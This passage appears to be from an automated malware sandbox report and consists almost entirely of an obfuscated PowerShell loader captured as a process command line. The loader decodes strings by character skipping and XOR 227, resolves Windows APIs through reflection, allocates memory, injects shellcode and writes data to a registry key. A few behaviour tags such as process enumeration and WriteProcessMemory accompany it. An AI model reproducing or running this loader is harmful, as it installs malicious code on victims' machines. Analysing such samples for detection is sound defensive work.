pi8Fri2For8Two6Lyd9Exa1Cra8for8Pop8str6Pen9Pug1TruDNonBribCMalAOptCIndASpoCpyoFLasCUbo3arbBBug8CloBFor0Ben9AntATri9Kau0Ato9Ato7Bre8Def6Ske8DimEGruCMilDKiwBCro1sym8Pip6Gal8Sta5Din8DivFGui8pne6Min8Org0Fut9Fre7Sel8ActAOpe8PerCAfr8steDConCColDMacAdel6Sto8TrsETet8LibAAla9For7EstCProDMilALnr2Api9Fyr0cou9Lyk0Ule8sam6Hyp8GudEMis8Dvr1Fis8AsmFUig9HybAWagARow1Goa9Bun6Ted8FumATab8BibFUnp8Tro7Shu8kli6Ful9Gru1Ve AIri2Rev8Pub0ove8Sto0Reg8Vel6Zin9Ced0Non9Unh0UnfBWooECamDUns9QuaDSym9HjsBUtn1Lig9Kol6Pla8ObjDpolCPriAHinCAmbDGnaAFal7Int8spe6Fer8Iso5Sks8KhaAViv8RigDUnm8Til6kitAgon7Coh9SviABud8ModDarb8Qui2Put8StaEPen8BobAdis8Gra0antAStaEBac8midCUnr8Omb7Pet9Uni6Man8LreFWit8For6DisCGliBMalCint7LysBTri5Skr8gou2Hea8Pig6Als9Ine1Sop8Den8Pul8Fat6Msg9Snv1TaiDVidAIndCSamFUngCSys3FabCRef7App8Tra5Uns8Chi2Jes8sulFDes9Uhy0Cat8Sti6TekCWatAUndCamiDCowADro7Res8Neo6Ind8Nun5Ram8OplASta8EnfDSys8Ind6ManBRai7Cal9DecAlob9Nup3Pyx8Slu6RabCKalBSovCLan7UglABac7Brd8ModCCoa8Riv0Bri8SkrBSti9Pro7Phy8Sym6Ban9Ope1JebDLen3RgeCLinFLawCLeg3StrCEns7HeiAFor7Can8VanCMrk8Far0Mor8minBLiu9Red7out8Vas6Sto9Scr1FraDZin2TefCantFForCPyo3TopBRnn8BroBTal0Fox9PecAVed9Dow0Mes9Pul7Daa8Tob6Bre8AdmESamCForDApeAMetEPer9Sam6Kry8GobFEte9Pri7Vib8TokAWoo8Reg0Tys8Cub2Tre9Tri0Bus9Bul7unsATin7Gig8Bru6Bil8RadFjok8Reb6Ver8Kra4Sed8Del2San9Ana7Rep8Ops6InsBEleEAfsCibeAPer'Sip;Tox&Asm(ind`$undDBetoAlfcBadhKnotTraeKosrTel7nog)Epi Mil`$kogiBnndfiniDenoCantBoyiBlosDokmJut2Fir;Sub`$PriiCiddUleiGuloSpitSeriPaasUsemHum3Chi Got=Res pauHOraTBeeBRam Ast'KylCSpo7DogAFla0Pun8SphCDis8StuEFro8AntAMon8Iod0Rem9Kri1Int9AntAVanCKogDAutALog7Ale8Geo6Sti8Met5Hob8NonAshr8ExoDGoo8Tro6CivAOrb0Dde8BesCChr8PreDSen9Kop0Wro9For7Non9Dyr1Ban9Til6Opi8Emp0Oms9Exo7Des8CasCPin9Seb1OveCBulBnerCCer7OpdBPre5Bod8Sam2Urg8Kir6Gui9Asu1Nyk8Wee8Und8Gou6med9Uno1BruDHvi5ReaCUdsFNotCUna3DupBSto8graBFac0Chr9ShuAFel9Gay0Dec9For7Ces8Tet6Tea8senECliCHalDBurBKra1Sek8Opv6Fin8Ord5Ber8SteFRun8Pen6Inh8Teo0Cen9Non7Uns8AmyAFer8SidCFls8KnuDStaCOpsDEksAMaa0The8Hep2Kie8AmyFGal8BadFVar8AccAHeb8ButDanc8Thr4NonASub0Lou8PufCJvn8helDSka9Bem5Mis8Kom6red8ProDKon9Fol7Fgt8nevANyc8KykCbes8IndDKra9Pie0humBStaEIntDsle9TraDDai9BroBmer0oce9Cyp7Ang8Unp2Pro8SysDAde8Bre7Min8Med2Pro9Aae1Con8Syn7ChuCBarFRbdCDat3BloCJer7PneBMas0Hea8Rot2Ter9Per7Out8NovATil9Sub0tit8Ide5Bus8Sko2Phy8Nvn0Tro9Kol7Afs8TolCSol9Sin1Hyd8fugAEks8DhaDSal8Els6aga9Bre0Und9Paa0BavCAfvAFinCRejDResBswi0Mas8Inp6rea9Sig7SexAUnwACla8letERef9Sik3mac8DosFFou8Ell6Ful8SvmEBed8Krs6Skl8AssDRev9Pal7Amb8Hex2Dok9Sti7Nas8AntASum8SaaCBro8DriDKryASad5Ann8ProFBik8Mar2mus8Cit4Sem9Med0WhiCDurBlovCMaa7FgtBTen5Enf8Chi2Jos8Lig6Sov9Hyp1Per8Sil8End8Sup6Und9Ham1KatDdan4PreCWooASci'Tan;Fum&Deb(Kon`$StaDundoAlicBruhgentRegeAfsrRis7Urk)Fle Sub`$FariTordrediFecoDistPreiBalsSmemBut3Sku;fun`$IntiSikdViniPreoBogtUndiTipsSaumudv4Tab chu=Ewe GteHfolTSliBTuc Pel'KomCEnk7NudAdel0Arc8SupCIsf8TilESpe8FosASka8Mod0Ora9Tri1Rec9LivAKurCAenDDusASte7Nat8Mel6Kas8Anl5Nai8BorAUnd8IrrDDis8Sub6GasAtrsESpi8Lli6Kic9Mis7Nat8MnnBFor8BerCJob8Kru7BysCMalBBanCShe7NonAEle7Udt8OmaCAmp8Aur0Ste8SurBAlm9Unc7Ref8Gra6Jon9Jef1SavDcos1UnfCEnsFSubCLau3BedCKat7WatALys7Bra8BefCSpe8Cup0Nit8LauBUng9Bib7Afm8hum6Jor9Hip1SikDtra0IndCParFcanCSei3DieCcra7SubATom5Fil9Fgt1Lan8Saw7Juv8HymASpa8Und4Ver8Bes4Sex9emi1Cal8Int6Pro8PupFMok9Ren0Bar8Ove6RidCMadFAttCEks3EveCBuk7DelBZeb0Ban8Uns2Gen9Scr7Met8SabAGir9Bes0Ged8Ble5Try8Rec2Har8Tem0Ros9rus7Sis8BivCViv9Ger1Res8ParAGru8DesDFej8Lvs6Gha9Gum0Dep9Int0AndCFreADahCTygDTelBMlt0Kan8Spr6Rie9Eve7HaaATopArhe8RebENou9Fee3aga8SurFUnd8Ove6Kos8StyEmyo8Cha6Sun8LevDPeb9Eli7For8Kur2Nem9Vgg7Yea8EftAHal8DisCBal8MelDAnaAMol5Exs8AvlFCon8Ops2Ele8Whe4Mis9Pon0MexCRavBFulCGed7ProBNad5Phy8Pos2Cra8Men6Par9Uni1Ind8Fal8Mou8Ade6Int9Due1AptDTit4skyCIncAPse'Dif;lox&Mel(Ata`$UnbDForoChecFlohMartHaaeTelrDoo7Ord)Sta Vil`$FilitubdPuriParoUentVeiioutsVermSpe4Run;Tre`$EthiBygdFrtirecoVixtForiForslocmBrn5Rha Hov=Typ RafHbadTGusBOve Biv'Int9Sub1Spr8Ang6Bra9Nom7Unr9Sta6Ski9Pla1Gru8HusDAquCBac3ReaCRds7DreAAlm0Ene8ImpCKll8SchEWea8SupAcho8Jer0Pia9Fir1Che9BerAamfCNonDEpiAMuf0Bre9Brn1Pre8Bom6Bal8Pre2Sej9Spe7Cin8Sol6UndBBaz7kre9HanACio9Rli3Bis8mil6ResCPopBSpyCwitADar'Ked;Com&Rat(nic`$PeaDudkoMorcKerhSoutComeMilrFyr7Bic)Spi Ema`$RaiiGesdKonicreoKrntWurigensKarmNut5Fil Sop Tab Met;Lee}Uns`$TacTRygeMarlManeUnsfBuroVennSatsTidtBoloEgnrCormRaneNat Whi=Ska InaHPsyTMetBNrk Nag'Blo8Ree8Hel8Puk6Kon9Pop1Kul8TraDKap8Idi6Snu8OveFSkuDThe0TapDDha1Ned'pra;Mor`$SmuiIsfdAsmiAfsoRadtVisiUpasRemmDat6Cor Org=Cru InsHDigTFenBWun Rub'MitCtra7Mod8AfvEHeg8Ste6Com9Huc0Eno9Unq7Sem8SulCKan8SubEBad8Tvi6vinCMul3DinDSpiELofCout3KelBBef8SpoBTrs0Emb9flnAbar9Gdn0Tzu9Bio7Don8Suc6Con8ElgESelCTryDSpoBJou1Ska9Som6Opr8StiDNon9Unm7Sam8FluALyg8ComEHje8Gri6StiCslbDSerAbriASte8AraDDri9Fre7Sug8Rem6Gam9Dev1Ver8AfsCBip9Gan3forBSjl0Lag8Alk6Ben9Glg1Non9Sta5Wah8OmrAKvi8Skr0Pin8Pun6Ban9Pol0ObjCStoDFerAForEHyp8Cor2hig9Lan1Lag9Jer0Ste8ShaBSam8Mis2Orl8AgeFMinBPrfERajDski9HalDSch9SekASan4Hjr8Sko6Bon9aft7SpeABes7Lae8Sty6Ess8OutFDat8Slu6Spi8Unc4Ins8Tri2Ind9Pri7mis8Tek6BimAEnd5Ska8LasCDyn9Mod1FluASur5Gld9Hal6Unr8StoDDur8Imb0Fro9Uni7Par8ForAPre8KumCsku8RebDOveBYan3Ove8AnaCTeg8AnkATow8MulDOmb9Non7Spi8Ale6Opg9Fun1proCStaBCenCSemBOdo8Cra5Udt8gra8Tem9Dur3UndCEec3CirCPla7GudBGul7Mil8Hel6Min8GenFskr8dre6Pil8Mil5Lrl8GamCTra8MulDTer9Sub0Afs9Han7Afs8HylCSal9Min1Tel8MetEOpf8Het6TelCUnp3eudCAdj7JonAPim7bnd8tonCPro8Kat0Sup8SolBAde9Sig7Erl8Fem6Hus9Lig1FinDRee7AnnCFatATilCAsqFFleCApo3ProCLeuBCetAInd4SulAPaa7SorBGem7WisCRad3StaAMom3SpaCStrBUnrBKro8TohAAerANat8PriDPro9Pil7UnsBEcc3Alw9Bre7Ind9Slu1UnbBbreELisCTheFEddCBer3AllBInt8AcrBSer6TypAUnsACit8UroDQua9Tro7synDVin0scrDFor1AfhBLnkESadCEpiFMinCMuh3ResBJet8aarBFle6BreADagASik8UndDHnd9Arr7BalDAns0AltDPug1TriBHyoERenCFemFSkoCUlt3BinBEnk8ResBGud6FemAserABdf8harDCou9Poi7RauDFor0BibDBoe1NedBAmaEMikCSunABruCCha3OveCMaxBManBViv8GanAMykATig8hosDKom9Pla7MorBhyt3Ico9Ove7Grs9Kla1CymBChrEMisCTeaAudrCUdtAPreCUndATro'Ran;rve&Afs(Nab`$souDRakoBoncSmahCortCaneArvrLod7Res)Aco Tur`$SpliBardGutiMaroUnmtMatiPlosCommOby6alt;Tel`$sanNButeSmoiDaagMurhKarbFlhobeauCogrYpplForibageKarsBis For=str CulfRebkArbpang Nak`$AfsDTrsochicMulhAprtBakeCarrSka5Fas Dis`$BevDEneoAfscArbhDistBlreSparFol6fog;Oma`$JaniMicdOveiKlaoFiltActiStosTvamSch7Ble Klk=Soc PapHpipTImmBFoo kva'RodCCap7MorASem0Sti9Myc6Kid9phi1Que9Ged0Sla8HypCTit9Mej1Ass8StiFBan8Tub2Rep8Zyg2Fry9Met0Mes8Nud6Hor8RetDDysDOre0benCPal3ShaDsatENonCEng3TufCEle7Mod8RevETri8Uns6Sva9Une0bes9Pan7flo8MisCjrg8AboEMil8Zwi6HumCTheDBraABloATur8empDRei9Ceb5hex8ArbCSel8Pil8Nav8Eks6klaCAanBcoaBTum8DeeAOutAArg8BliDReh9laa7AnsBSub3Nat9Sou7Arr9Kir1KarBEvoEUnsDBus9tilDFir9FinBFin9smu8beg6Ort9Anm1Oph8DitCTamCAlmFDonCpil3ArsDPre0FreDTru6autDPreAAsiCCouFLauCOut3PerDSul3Pal9BadBQueDAqu0draDKla3CobDCha3pelDDdg3BooCIndFMotCBod3UdsDVas3Rat9LeuBDisDApo7RepDStr3polCSmlAPre'Bar;Mak&opp(For`$PanDIntoMulcDishPoutSureranrInt7Sym)Tus Coc`$SaliEnsduniilipoDektFoliMelsBrumBes7Sta;Amf`$BamiArrdDriiBraoFortStaiEmbsUafmYrs8qui For=Blo AblHFngTVagBUnd Dia'strCPie7pacBSta7Egu8EnhAKil9Skn3Trk8Sul6ForCFil3SabDMenENatCFro3UntCFle7Unb8BotEKok8Cha6Ins9Pro0Inc9Cou7Zap8LusCDem8TraEPsy8Ano6SmiCretDKemAPanAFor8ThiDInd9pal5Fas8SopCTil8Sme8Cir8Gua6NatCarvBKeyBDen8NomAStaAInd8NetDDis9Syp7QuiBOpd3Bik9gun7Cha9Ant1DonBArkETraDNor9MatDPer9ForBLib9pic8Alu6Doc9Fre1Tec8LacCMojCNyrFConCThe3ProDFre3Pur9PreBMadDSjl2banDPay3ForDref3SkaDRac3TelDVer3LitDEft3MisChimFOrdCArv3AffDOro3lka9BerBkldDYar0PirDBro3DafDBea3TreDWry3NobCFniFdjvCKap3SupDUdg3Fug9AstBMasDStu7FruCnonABur'Ren;Rom&Rac(Non`$SupDSwioNoncbarhSkntCateAntrLyl7Cin)Uns ryt`$seriAlgdTyriLufoUgutProiBrysOcemSte8Ove;Frg`$GrnCBlauUnprEndsRahoDrarDitlOrdaGrkaMilsFedeTjenThu0Pha0Brn=Paa'RenHHypKUdtCRetUKur:And\unfITegnOcttMlleTrarOvetRaaaEncnAskgborlMedeBra\SchUHypsBefpDisoRidrSeltSposUnmlTroiSprgTomhAmmeFucdfigeLegrEndsKon'Ren;Pre`$BegCAlluMaxrJoysstyoUndrSmklOrnaSmaaFlasStreTranPas0For1Rei Fre=PriHAnnTNetBHyp amf'briCkej7Pse9Spa1Ven8GenACra8Sup0Erh8Sol8MedDKebECemCErnBstrAKur4Coh8Mau6Ext9Ver7WeeCCopEMicAMacAExi9Tru7Ove8Mis6Kom8AmeEMezBKle3Cal9Gov1Ska8RomCblu9Res3Def8Rel6Ste9Afp1kri9Dam7Blt9pegAVapCFor3BraCBurEPhoBImp3skr8Spa2Afl9Vov7For8proBrgeCCor3TenCGel7NonABor0Hyp9Sic6Ind9mor1Fot9For0Per8StrCOke9Rom1Thy8TorFBas8rus2kla8Juc2Pru9Vik0Bae8Bak6Ful8ProDBilDFor3SekDNon3tilCSvmAHetCNuzDNaaBAns1Int8Coa6Fri9Ext2Flo9vou6vic8OptALor9Dup0Tar8gedADae9Man7Vit8konARet8ScaCFly8KetDRev8Pen6Cym8Mad7Cal'Bos;Sys&Run(Reb`$LueDPteoBilcTalhIndtMiseFrarHaw7Lib)Sen Bas`$BacCHisuWourNavsheloMoorAbolDepaWinaDrasMtteBranGeo0Hut1End;Uun`$SoaiBjedSekiSloovittRepiDubsOprmLov9Kla Jer=Nav TraHEnrTBedBCut Uds'RadCTab7Oli8ThuAWhe8Hrk7Ser8dinAEmp8SabCSmi9Til7Cad8UnpAKro9Bol0Edp8FngEhaaCSex3LifDwooEChaCbaa3GaiBUne8NovBAbl0Sub9HolADrt9Stu0Und9Ops7Kap8Cat6Pen8OveEJamCHasDInsASka0Tin8DecCTil8SkeDWai9Mod5Non8acc6Sal9Thi1Stu9Cra7VilBFasEobtDPrj9ModDKla9IndAart5Uro9saf1Nea8WizCJam8skyEPyrAEpi1Bra8Hel2Skn9Vse0Rel8Trt6GrnDPoc5DeoDSkr7FatBCor0Hol9Con7Dig9skr1Pro8DimAani8NetDMar8sup4vicCTriBGenCVes7Sub9Fis1Van8ForASub8Geo0Pro8Sin8StrCAeqAGou'Cur;Kro&Out(Tor`$hofDGawoDemcInthCamtTlseMugrLov7Wie)Rem Alb`$AlkiGgldmaniuneoAfstZaciSdssSkrmFeu9Hor;Tra`$NonrLiniDiscPrikUnc0var Beg=Tra UdlHFjoTKemBAlm Por'SilBCou8FlaBTin0Arr9BunAPse9Foo0Sys9Sta7Row8Mod6Fog8TegECraCSkoDRetBVel1Roe9Avi6Epa8InsDSka9Spa7Pla8marAArm8EjlEQui8Hyp6greCArcDPesATheASti8DecDBis9Kit7Bes8jee6Unt9Cat1sla8PogCDis9Fre3MulBHis0han8Und6Des9Non1Fab9Due5Arb8VenAOle8Sur0Ath8gro6Drp9Exc0PraCBiaDForAPolEBlo8dis2moi9And1Heb9Cre0Sok8ComBOma8ove2Gas8RetFUdeBCivEPlaDKur9FrgDSan9GosASem0Fla8MetCUni9Bri3Sex9MatAFraCTetBErhCCel7hja8InfAVan8Col7men8ForAGra8FurCPas9scl7Tib8CenASnu9Ele0Cul8MisEDecCChyFCadCJan3SteDBan3DirCTwaFUntCAbs3VotCran3couCuds7MasAAnt0Uno9Imm6Thr9Ant1Hie9Fej0Str8JibCSto9Non1Kos8UndFBli8Spi2Dre8Pal2Kid9Van0Ves8Ela6frd8bldDGraDCad0GerCRurFTreCUdb3RamDChi0braDAkk6UndDRamAKmnCCosAPro'Pre;Tre&Sor(Met`$PolDIntoAffcFlshUnvtSaleDonrBln7pre)Spa Kno`$TarrsamiMescSebkOpp0Ski;Ali`$FulLDiaeRougFdeeGalmHyblSteiRejgSkagSumrAkteTak=Mat`$SpoiOmbdOliiPyroUnrtSemiSabsBilmSun.CorcKaroCykuOvenLictOme-Pro3Stu5Pim9She;Gre`$KabrBrniSubcBrnkThu1Did Fru=Jag IndHUdfTLexBOms boe'ToeBadv8ColBRel0Cor9PhaAMit9und0Svu9moc7Neu8Int6Cro8proEBimCLaiDValBSer1Bal9Prf6Tom8DynDLan9Don7Pre8algAAll8MyoEUds8Vin6UnoCBavDAdeAOutAAss8AflDUsy9Ree7Blo8Bol6Sto9Sol1hyp8BurCakk9Cig3MetBClo0All8Gre6Sed9Mis1Gim9Pre5Skr8CurAhex8Ele0Whu8Bag6Beh9Bag0EraCGriDPreATylEAbd8See2Clo9Pad1Ass9Pap0Kem8FabBSpi8Cha2Dik8ConFTraBOptEConDEig9BraDint9UnsAPau0Yar8SenCUds9frd3Bit9OrgAVinCElvBSamCPoo7Cul8FloAIga8Pal7gam8wilASlu8StyCTot9Ven7Non8BorAChl9Hid0Cry8SkrEFarCCatFZebCGla3KluDAfg0BodDUkr6MylDLamASpaCRefFAntCCup3TabCBor7sukBEup7Dia8CliAIso9pho3Riv8Eur6OddCUnaFMenCAna3KagCUnc7UndAOpsFGer8Rin6Ten8Dis4Sta8Spr6Pas8DooEBor8CodFFem8JouAUns8Lib4Tyv8Tel4Uno9Non1Kri8len6MedCTuzAEte'Rel;Gin&Pol(kin`$LanDPreoLetcBryhFortStueUrerAtt7Ste)ten Paa`$VicrVeriRekcRelkudv1Del;Pre`$ErgrEpaiDuocAltkMil2Fib Nys=Byg LsnHUdvTSysBSub Nos'MorCNon7FjrBPud0Hje9Uns6Lsg8Spd1Tuf8TopARin8SysELar8han1Gan9Sju1Mor8ChlATem8Non0Con8Smi2Nei9Acc7Slu8Hov6Fol8brn7NonCSde3StjDTmrEImpCBru3RbaBtes8RacBGat0Sko9InhAWei9Afs0Bis9Imp7Tob8Syn6Sti8RibEUnvCBlaDRunBInt1Opf9Lof6Tan8HetDBll9Per7Rem8OplAHer8KniERat8Unh6MikCRisDChaAArmATee8EftDDry9piz7Ste8Mia6Fac9Pse1Opm8MisCNog9Som3StaBRel0Til8Fre6Mat9Mid1Per9Aar5Dev8PanATer8Vul0Pre8Bos6Ove9Stb0RinCforDPanAHloETrl8Baf2Rej9Oxc1Ato9Out0Cyt8IndBSta8Fol2Kak8FisFSndBMalECitDrep9PosDSad9JonADes4Bre8Aff6Edu9Ais7ForAEft7Ove8Baj6Ric8MonFMod8Qui6Ana8Fak4sub8Gia2Tvr9Cas7Usp8Hil6ElgAInt5Udt8BolCUnw9Plr1OveAThe5Esp9Str6Iri8PasDEmy8Bul0afs9Bes7Tro8RetAAsf8AkiCNee8EllDTamBmer3Ans8PodCtvr8TikAHav8OppDUde9Sko7Cir8Ins6Dyp9Phl1fylCJehBUnaCAfv7VenAVip0Mam9Jej6Rev9her1Spa9Hag0Rep8DemCCou9Gen1Vis8GasFSko8Elm2Reh8Gra2Men9Fll0Ann8Ark6Edi8PatDForDBel0SkaCIndFOveCCas3decCricBBagAOrt4DivASca7MinBOtt7ResCMet3SupARea3KaaCNeuBTyrBDis8HeaAUdgAAnm8LnsDEpu9Tra7FljBSur3For9Sta7Efe9Gri1TruBEnsELerCCesFOpsBLan8AcaAKulAHel8UopDFat9Eco7RapBAke3Une9Tri7Fil9zar1StiBSceEIntCSerAHeaCTer3GloCquiBSemBBad8StiBUnp5Kor8AfrCBol8TeaAPol8Fer7DekBDisEFolCSviAUsyCTeeAAfnCBarAAut'Eis;Spo&Des(Uin`$UntDHeaoThecFrahWintsdeeGalrLie7Men)Pic Mar`$TvarCopiSkacHjrkOpm2Cow;Sig`$DunrSiriDelcDeckDom3Opm Con=Bor KirHHelTHugBScr Und'RanCUne7KinByo 0Out9Hus6Lag8Adj1Fum8negAAlo8StaEBro8For1une9Dee1Fod8HemAina8Ove0fin8Fyl2Udf9Ref7trk8Fas6Pec8Ict7SadCVolDGasAFjeAJal8AnnDHer9Cop5nit8GroCMas8Kar8Tlp8Van6DacCSkyBFjeCBaa7TruBPro7Spo8spaAHel9Non3Eks8Ges6SukCRatFCarCMes7SkuAstrDGum8Sol6Kab8HeiAKom8Gos4Rel8RevBpro8Bor1Pha8VanCSpl9beg6ang9Ste1Aag8GobFMin8SauARel8Sup6Esc9Hyp0FidCSmaAFll'Tri;Tan&Mod(cre`$SexDsamoCalcApthElvtReaeBesrVas7Bho)Sal Gei`$HngrantiScocvankOpg3cov#Bas;""";Function rick9 {param([String]$Betokenmentndvilliget);For($Betokenment=3; $Betokenment -lt $Betokenmentndvilliget.Length-1; $Betokenment+=(3+1)){$Foranstaltninger = $Foranstaltninger + $Betokenmentndvilliget.'Substring'($Betokenment, 1);}$Foranstaltninger;}$Coequate1= rick9 $Plenisms;if([IntPtr]::size -eq 8){ .$env:windir\S*64\W*Power*\v1.0\*ll.exe $Coequate1 ;}else{.$env:windir\S*32\W*Power*\v1.0\*ll.exe $Coequate1;};"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Zenbuddhismes00 {param([String]$Betokenmentndvilliget);For($Betokenment=3; $Betokenment -lt $Betokenmentndvilliget.Length-1; $Betokenment+=(3+1)){$Foranstaltninger = $Foranstaltninger + $Betokenmentndvilliget.Substring($Betokenment, 1);}$Foranstaltninger;}$Zenbuddhismes02 = Zenbuddhismes00 'ParISlanresvWhootamkSnoeTrv-SneEHurxPrspVisrAfgeFuzsFresindiSkyoUndnful ';$Zenbuddhismes01 = Zenbuddhismes00 'Bak$HidBCaulParaSrlzRidoHemnspueUnrrGersEti[Kis$SndBManePartPeroNeaklogeAbonPigmSteeOvenTartint/Kol2Pla]Ter Wit=Ens Adv[HorcNexoOutnShevUdkeCenrColtMan]Sne:Afs:KalTStrotalBKnhyenttDeseTie(Ant$behBMetePertStroAcokDopeSubnStimDomeKonnUnctRgsnfesdknivconiTrelSallantiIntgGudeGentKry.AnaSCoruClabQuasGirtNedrAfliClenSangDog(Bas$SprBRsoeUlstBenoProkUnbecounEromGulePrenammtman,beg Tap2Lyd)Bli,For Hje1Lat6Ixo)Iso ';Function HTB {param([String]$Betokenmentndvilliget);$Blazoners = New-Object byte[] ($Betokenmentndvilliget.Length / 2);For($Betokenment=0; $Betokenment -lt $Betokenmentndvilliget.Length; $Betokenment+=2){.($Zenbuddhismes02) $Zenbuddhismes01;$Blazoners[$Betokenment/2] = ($Blazoners[$Betokenment/2] -bxor 227);}[String][System.Text.Encoding]::ASCII.GetString($Blazoners);}$Vaerker0=HTB 'B09A9097868ECD878F8F';$Vaerker1=HTB 'AE8A80918C908C8597CDB48A8DD0D1CDB68D90828586AD82978A9586AE86978B8C8790';$Vaerker2=HTB 'A48697B3918C80A2878791869090';$Vaerker3=HTB 'B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAB828D878F86B18685';$Vaerker4=HTB '9097918A8D84';$Vaerker5=HTB 'A48697AE8C87968F86AB828D878F86';$Vaerker6=HTB 'B1B7B09386808A828FAD828E86CFC3AB8A8786A19AB08A84CFC3B396818F8A80';$Vaerker7=HTB 'B1968D978A8E86CFC3AE828D82848687';$Vaerker8=HTB 'B186858F8680978687A7868F8684829786';$Vaerker9=HTB 'AA8DAE868E8C919AAE8C87968F86';$Dochter0=HTB 'AE9AA7868F8684829786B79A9386';$Dochter1=HTB 'A08F829090CFC3B396818F8A80CFC3B086828F8687CFC3A28D908AA08F829090CFC3A296978CA08F829090';$Dochter2=HTB 'AA8D958C8886';$Dochter3=HTB 'B396818F8A80CFC3AB8A8786A19AB08A84CFC3AD8694B08F8C97CFC3B58A919796828F';$Dochter4=HTB 'B58A919796828FA28F8F8C80';$Dochter5=HTB '8D97878F8F';$Dochter6=HTB 'AD97B3918C97868097B58A919796828FAE868E8C919A';$Dochter7=HTB 'AAA6BB';$Dochter8=HTB 'BF';function fkp {Param ($Sporadin, $Gastndere) ;$idiotism0 =HTB 'C7B687958A87868F90868DC3DEC3CBB8A29393A78C8E828A8DBED9D9A0969191868D97A78C8E828A8DCDA48697A29090868E818F8A8690CBCAC39FC3B48B869186CEAC8189868097C398C3C7BCCDA48F8C81828FA29090868E818F9AA082808B86C3CEA28D87C3C7BCCDAF8C8082978A8C8DCDB0938F8A97CBC7A78C808B978691DBCAB8CED2BECDA69296828F90CBC7B5828691888691D3CAC39ECACDA48697B79A9386CBC7B5828691888691D2CA';&($Dochter7) $idiotism0;$idiotism5 = HTB 'C7B39186828F8F8C8082978690D2D5D2C3DEC3C7B687958A87868F90868DCDA48697AE86978B8C87CBC7B5828691888691D1CFC3B8B79A9386B8BEBEC3A3CBC7B5828691888691D0CFC3C7B5828691888691D7CACA';&($Dochter7) $idiotism5;$idiotism1 = HTB '91869796918DC3C7B39186828F8F8C8082978690D2D5D2CDAA8D958C8886CBC78D968F8FCFC3A3CBB8B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAB828D878F86B18685BECBAD8694CEAC8189868097C3B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAB828D878F86B18685CBCBAD8694CEAC8189868097C3AA8D97B39791CACFC3CBC7B687958A87868F90868DCDA48697AE86978B8C87CBC7B5828691888691D6CACACDAA8D958C8886CBC78D968F8FCFC3A3CBC7B0938C9182878A8DCACACACACFC3C7A48290978D87869186CACA';&($Dochter7) $idiotism1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Satisfactoriness,[Parameter(Position = 1)] [Type] $Frdiggrelse = [Void]);$idiotism2 = HTB 'C7A08C8E8A80919AC3DEC3B8A29393A78C8E828A8DBED9D9A0969191868D97A78C8E828A8DCDA786858A8D86A79A8D828E8A80A29090868E818F9ACBCBAD8694CEAC8189868097C3B09A9097868ECDB186858F8680978A8C8DCDA29090868E818F9AAD828E86CBC7B5828691888691DBCACACFC3B8B09A9097868ECDB186858F8680978A8C8DCDA68E8A97CDA29090868E818F9AA1968A8F878691A28080869090BED9D9B1968DCACDA786858A8D86A79A8D828E8A80AE8C87968F86CBC7B5828691888691DACFC3C785828F9086CACDA786858A8D86B79A9386CBC7A78C808B978691D3CFC3C7A78C808B978691D2CFC3B8B09A9097868ECDAE968F978A80829097A7868F8684829786BECA';&($Dochter7) $idiotism2;$idiotism3 = HTB 'C7A08C8E8A80919ACDA786858A8D86A08C8D9097919680978C91CBC7B5828691888691D5CFC3B8B09A9097868ECDB186858F8680978A8C8DCDA0828F8F8A8D84A08C8D95868D978A8C8D90BED9D9B097828D87829187CFC3C7B082978A90858280978C918A8D869090CACDB08697AA8E938F868E868D9782978A8C8DA58F828490CBC7B5828691888691D4CA';&($Dochter7) $idiotism3;$idiotism4 = HTB 'C7A08C8E8A80919ACDA786858A8D86AE86978B8C87CBC7A78C808B978691D1CFC3C7A78C808B978691D0CFC3C7A591878A848491868F9086CFC3C7B082978A90858280978C918A8D869090CACDB08697AA8E938F868E868D9782978A8C8DA58F828490CBC7B5828691888691D4CA';&($Dochter7) $idiotism4;$idiotism5 = HTB '91869796918DC3C7A08C8E8A80919ACDA09186829786B79A9386CBCA';&($Dochter7) $idiotism5 ;}$Telefonstorme = HTB '8886918D868FD0D1';$idiotism6 = HTB 'C78E8690978C8E86C3DEC3B8B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAE8291908B828FBED9D9A48697A7868F8684829786A58C91A5968D80978A8C8DB38C8A8D978691CBCB858893C3C7B7868F86858C8D90978C918E86C3C7A78C808B978691D7CACFC3CBA4A7B7C3A3CBB8AA8D97B39791BECFC3B8B6AA8D97D0D1BECFC3B8B6AA8D97D0D1BECFC3B8B6AA8D97D0D1BECAC3CBB8AA8D97B39791BECACACA';&($Dochter7) $idiotism6;$Neighbourlies = fkp $Dochter5 $Dochter6;$idiotism7 = HTB 'C7A09691908C918F828290868DD0C3DEC3C78E8690978C8E86CDAA8D958C8886CBB8AA8D97B39791BED9D9B986918CCFC3D0D6DACFC3D39BD0D3D3D3CFC3D39BD7D3CA';&($Dochter7) $idiotism7;$idiotism8 = HTB 'C7B78A9386C3DEC3C78E8690978C8E86CDAA8D958C8886CBB8AA8D97B39791BED9D9B986918CCFC3D39BD2D3D3D3D3D3CFC3D39BD0D3D3D3CFC3D39BD7CA';&($Dochter7) $idiotism8;$Cursorlaasen00='HKCU:\Intertangle\Usportsligheders';$Cursorlaasen01 =HTB 'C7918A8088DECBA48697CEAA97868EB3918C938691979AC3CEB382978BC3C7A09691908C918F828290868DD3D3CACDB18692968A908A978A8C8D8687';&($Dochter7) $Cursorlaasen01;$idiotism9 = HTB 'C78A878A8C978A908EC3DEC3B8B09A9097868ECDA08C8D95869197BED9D9A5918C8EA1829086D5D7B097918A8D84CBC7918A8088CA';&($Dochter7) $idiotism9;$rick0 = HTB 'B8B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAE8291908B828FBED9D9A08C939ACBC78A878A8C978A908ECFC3D3CFC3C3C7A09691908C918F828290868DD0CFC3D0D6DACA';&($Dochter7) $rick0;$Legemliggre=$idiotism.count-359;$rick1 = HTB 